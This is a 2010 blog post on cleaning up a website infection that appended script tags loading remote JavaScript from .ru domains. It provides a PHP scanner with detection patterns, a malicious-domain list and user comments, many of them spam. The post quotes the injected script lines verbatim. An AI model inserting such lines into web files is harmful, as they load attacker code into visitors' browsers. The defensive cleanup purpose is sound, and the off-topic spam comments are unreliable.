
Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory, then open the page in any browser. I’ve built in many features, including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only, and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing the FTP credentials for websites you have access to. An automated script then logs in to your site over FTP and appends a link to their malicious code to your PHP and JS files.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run MalwareBytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords
  4. Update JAVA – According to this CERT KB
  5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.
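As an added example (my own code, not the author’s .RU Removal Script linked above), here is a PHP scanner with the same four features the post lists: directory recursion, extension filtering, a .bak backup of every file it changes, and a search-only mode versus a fix mode. It also speaks to the 8/26 update: two of its three patterns match the shape of the injection (the split '<sc'+'ript' tag, and a script tag followed by the 32-hex-digit HTML comment) rather than the .ru suffix, so they catch hosts under other TLDs; only the third pattern depends on the known-domain list, which is the one from the post. The extension list, the scan root, the file name ruscan.php and the output format are this example’s own assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the author's .RU Removal Script. Recursively scans a web
// tree for the two injection shapes quoted in the post and, in "fix" mode,
// strips them after writing a .bak copy of each changed file. The extension
// list, host list and output format are this example's own assumptions.

const SCAN_EXTENSIONS = ['php', 'js', 'html', 'htm'];

// Domains quoted in the post; extend as new ones are reported in the comments.
const KNOWN_BAD_HOSTS = [
    'pocketbloke.ru', 'inkrainbow.ru', 'pantsletter.ru', 'fightkid.ru',
    'shirtdifficulty.ru', 'casechick.ru', 'obscurewax.ru', 'nuttypiano.com',
];

// Each regex captures the injected host in group 1.
//  split-tag:      the document.write('<sc'+'ript ... '+'pt>') form seen in JS
//                  files, matched by its obfuscated shape, whatever the host.
//  marker-comment: a script tag immediately followed by the 32-hex-digit HTML
//                  comment appended to PHP/HTML files, again for any host.
//  known-host:     a plain script tag, accepted only when the host is on the
//                  list above, so legitimate external scripts are not removed.
function injectionPatterns(): array
{
    $hosts = implode('|', array_map('preg_quote', KNOWN_BAD_HOSTS));
    return [
        'split-tag' =>
            '~document\.write\(\s*\'<sc\'\s*\+\s*\'ript[^\']*?src="https?://([^/"\']+)[^\']*\'\s*\+\s*\'pt>\'\s*\);?~i',
        'marker-comment' =>
            '~<script[^>]*src="https?://([^/"]+)[^"]*"[^>]*>\s*</script>\s*<!--[0-9a-f]{32}-->~i',
        'known-host' =>
            '~<script[^>]*src="https?://(' . $hosts . ')/[^"]*"[^>]*>\s*</script>~i',
    ];
}

// Scans one file. Returns one entry per match; rewrites the file only in fix mode.
function scanFile(string $path, bool $fix): array
{
    $original = file_get_contents($path);
    if ($original === false) {
        return [];
    }
    $hits = [];
    $cleaned = $original;
    foreach (injectionPatterns() as $name => $regex) {
        if (preg_match_all($regex, $cleaned, $m) > 0) {
            foreach ($m[1] as $host) {
                $hits[] = ['file' => $path, 'pattern' => $name, 'host' => strtolower($host)];
            }
            $cleaned = preg_replace($regex, '', $cleaned);
        }
    }
    if ($fix && $cleaned !== $original) {
        copy($path, $path . '.bak');          // back up first, then overwrite
        file_put_contents($path, $cleaned);
    }
    return $hits;
}

// Walks $root recursively, visiting only files with a listed extension
// (.bak copies are skipped automatically because "bak" is not listed).
function scanTree(string $root, bool $fix): array
{
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if ($file->isFile()
            && in_array(strtolower($file->getExtension()), SCAN_EXTENSIONS, true)) {
            $hits = array_merge($hits, scanFile($file->getPathname(), $fix));
        }
    }
    return $hits;
}

// Entry point: "php ruscan.php [search|fix] [dir]" from a shell, or
// ruscan.php?mode=fix when uploaded to the web root. Default is search only.
$mode = $argv[1] ?? ($_GET['mode'] ?? 'search');
$root = $argv[2] ?? __DIR__;
$fix  = ($mode === 'fix');

header('Content-Type: text/plain');   // ignored under the CLI SAPI
$hits = scanTree($root, $fix);
foreach ($hits as $hit) {
    printf("%s %-14s %-20s %s\n", $fix ? 'REMOVED' : 'FOUND  ',
        $hit['pattern'], $hit['host'], $hit['file']);
}
printf("%d injection(s) %s under %s\n", count($hits), $fix ? 'removed' : 'found', $root);
```

Run it in search mode first and read the reported hosts: a split-tag or marker-comment hit is a strong sign of this infection regardless of domain, while a known-host hit is only as good as the list, so add any new domain from the comments before switching to fix mode. Once the site is verified clean, delete the .bak copies, since they still contain the injected tags.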

Categories: Malware, PHP, Randomness, Security

  1. Edwin
    September 7th, 2010 at 18:56 | #1

    Thanks for the script, really appreciate your work here.
    I have this hack on 6 hosting accounts now and each account has 100k+ files as each account has about 100 domains with wordpress installed on it 🙁

  2. September 8th, 2010 at 12:38 | #2

    My site vidyaweb.com was also taken down by infection from pocketbloke.ru. I made do by using Filezilla without saving passwords in the Quickconnect Bar for a week. Today, I scanned my PC and discovered two suspected hidden files kkypqe.sys and frtisc.sys in the folder c:\windows\system32\drivers, suspected to be rootkits by Avira anti virus, with hidden registry keys of the same name. However, Avira was not able to delete them and I had to resort to booting through Linux and deleting the suspected files.

    Thereafter, I was also able to delete the registry keys too, but only after changing permissions on them. Besides these, no other infection was detected by Avira.

    Can I safely assume now that I am free of malware and start trusting Filezilla again?

  3. Default User
    September 12th, 2010 at 10:44 | #3

    vikram solia :
    Can I safely assume now that I am free of malware and start trusting Filezilla again?

    No. If you get infected again by visiting an infected site or getting an infected email, it’ll start all over again. Use FZ by all means, but don’t store passwords in it.

  4. Clarkson
    September 15th, 2010 at 17:48 | #4

    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

  5. Default User
    September 16th, 2010 at 10:42 | #5

    Clarkson :
    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

    The virus doesn’t just target FZ, it looks for all FTP traffic and sniffs the credentials (sounds rude). FZ is just a widely used client.

  6. Default User
    September 16th, 2010 at 10:43 | #6

    Default User :

    Clarkson :
    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

    The virus doesn’t just target FZ, it looks for all FTP traffic and sniffs the credentials (sounds rude). FZ is just a widely used client.

    And maybe even some other traffic like cPanel and browser login storage. Who knows what it can find.

  7. September 16th, 2010 at 17:24 | #7

    Default User :

    Default User :

    Clarkson :
    @Default User
    As I previously mentioned, FZ is not the common denominator. I don’t even have FZ installed, and a couple of my sites had this problem – sites that no one else had the username/password for, except me and my PC.

    The virus doesn’t just target FZ, it looks for all FTP traffic and sniffs the credentials (sounds rude). FZ is just a widely used client.

    And maybe even some other traffic like cPanel and browser login storage. Who knows what it can find.

    Use Keepass, and just like with FZ don’t save P/W in your browsers. Install qfxsoftware.com’s Keyscrambler to evade those sniffers 🙂

  8. Carlitos
    November 28th, 2010 at 08:00 | #8

    Hi…
    I’m a regular PC user like most and only use the web to access my Facebook, news etc. I don’t use any FTP clients like FZ. But the other day I checked my log after my scheduled virus scan, and there it was: pocketbloke.ru/facebook.js
    To me this indicates that somehow, somewhere when using Facebook this happened. I cleaned up the mess as best I could by using Malwarebytes Anti Malware and Nod32 (quarantined).
    So my questions are: Are Facebook users in danger now and should I report this to FB HQ? And should I, to be sure, maybe reinstall my OS and change my passwords to Facebook, Windows Live Messenger etc.?

  9. December 19th, 2010 at 20:38 | #9

    “All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only and search and fix.”
    You can more about this?

  10. June 8th, 2011 at 15:29 | #10

    That is another website, pantscow.ru

  11. July 25th, 2011 at 05:28 | #11

    Hey Can we somehow edit the code of your script to add some other text
    which needs to be removed.

    I mean if infection is from included infections in your code.

  12. February 17th, 2013 at 11:17 | #12

    Wonderful blog! I found it while surfing around on Yahoo News.

    Do you have any tips on how to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Thank you

  13. July 14th, 2013 at 05:31 | #13

    ” Take the time to include this exercise in your arsenal of in home conditioning workouts. This alone at a high enough intensity would be a lot more effective for burning fat than the 30 – 60 minutes on a treadmill. This provides the muscles an opportunity to do some work, expend energy, and keep the muscles in good tone and fitness.

  14. August 3rd, 2013 at 02:40 | #14

    Why visitors still use to read news papers when in this technological
    globe the whole thing is accessible on web?

  15. August 6th, 2013 at 04:55 | #15

    Does your site have a contact page? I’m having trouble locating it but, I’d like to send you an email.
    I’ve got some suggestions for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it improve over time.

  16. August 23rd, 2013 at 06:33 | #16

    Hello this is kind of of off topic but I was wondering if blogs use WYSIWYG
    editors or if you have to manually code with HTML. I’m starting a blog soon but have no coding know-how so I wanted to get advice from someone with experience. Any help would be greatly appreciated!

  17. October 21st, 2013 at 15:11 | #17

    Hi, just wanted to say, I loved this article. It was funny.

    Keep on posting!

  18. October 26th, 2013 at 01:27 | #18

    For the writing techniques I use, see Mary Duffy’s e-book: Sentence Openers.
    You will discover better results and very quickly will have a very deeper comprehension of what are the benefits to
    get a fantastic article promotion campaign.

    These newer solar power panels for homes can utilize this
    weaker sunlight, through converting it may generate more power in a very given day to
    your home.

  19. November 26th, 2013 at 23:57 | #19

    What’s up, its good post on the topic of media print, we
    all be aware of media is a fantastic source of information.

  20. November 27th, 2013 at 03:23 | #20

    Fantastic beat ! I would like to apprentice even as you amend your website, how could i subscribe for a blog website?
    The account helped me a applicable deal. I were a little bit familiar of this your broadcast provided brilliant clear idea

  21. December 5th, 2013 at 08:28 | #21

    Usually I don’t read article on blogs, but I would like
    to say that this write-up very pressured me to check
    out and do it! Your writing taste has been surprised me.

    Thank you, very nice post.

  22. October 1st, 2014 at 17:31 | #22

    Very energetic article, I loved that bit. Will there be a
    part 2?

  23. October 11th, 2014 at 23:13 | #23

    The backend part of your company supports these
    profit centers. Then consider yourself one
    of the few, true internet marketers. For more information visit: security gives you the protection from all kinds of worms,
    viruses and other problems.

  24. JK Cinema
    January 25th, 2015 at 20:45 | #24

    I must have downloaded something I shouldn’t have & now my Homepage is being hijacked by http://hi.ru/?10

  25. October 26th, 2015 at 17:10 | #25

    Maximizing the open concept for your custom home design can also
    be done by separating each space with a change in floor treatments.

    Fantasy Signs ‘ these can be added to a
    kids room, or as regular wall art. Many of the homes with Greek style utilize the front-gable design, which
    reflects most of the traditional Greek homes.

  26. December 6th, 2015 at 03:53 | #26

    Thank you for the auspicious writeup. It in reality used to be a entertainment account it.
    Look complex to more introduced agreeable from you!
    By the way, how could we keep up a correspondence?
